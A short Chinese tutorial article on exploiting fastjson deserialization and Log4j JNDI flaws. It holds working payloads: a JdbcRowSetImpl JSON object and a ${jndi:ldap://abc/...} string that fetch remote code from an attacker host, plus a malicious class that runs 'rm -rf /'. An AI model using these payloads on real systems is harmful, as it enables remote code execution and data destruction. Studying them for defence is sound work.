有 attach.class (编译好的文件)
static{
Runtime.getRuntime().exec("rm -rf /");
}
1.rmi注入
攻击者建立rmi服务端,于rmi服务端建造一系列攻击对象 ,假设远程地址为 http://abc,可url链接到恶意class-attach.class
若被攻击者访问到此服务 rmi://abc/attach.class ,静态代码块会优先加载,无需构造对象。
fastJson通过序列化漏洞 fastJson<=1.2.47 (高版本添加了序列化白名单和黑名单)
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://abc/attach.class",
"autoCommit":true
}
}
在调用JSON.parse()时,若序列化字符串里为上述字符串,则会自动将JdbcRowSetImpl 的 dataSourceName链接改为 rmi远程地址并访问。
2.LDAP注入
JDK < 8u191
高版本需要设置参数才可开启漏洞
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
Log4j2.x<=2.14.1
JNDI(Java Naming and Directory Interface)是Java平台中的一种API,用于访问命名和目录服务
攻击者搭建 一个 ldap服务器(如marshalsec)假设远程地址为 http://abc,可url链接到恶意class-attach.class
str="${jndi:ldap://abc/attach.class}";
logger.error(str);//logger.info(str);
会根据表达式去寻找对应的目录
若被攻击者访问到此服务 jndi:ldap://abc/attach.class ,静态代码块会优先加载,无需构造对象。文章来源:https://www.toymoban.com/news/detail-586617.html
若在attach.class使用dnslog即可完全控制web应用文章来源地址https://www.toymoban.com/news/detail-586617.html
http://www.dnslog.cn/
到了这里,关于fastJson反序列化漏洞和log4j漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!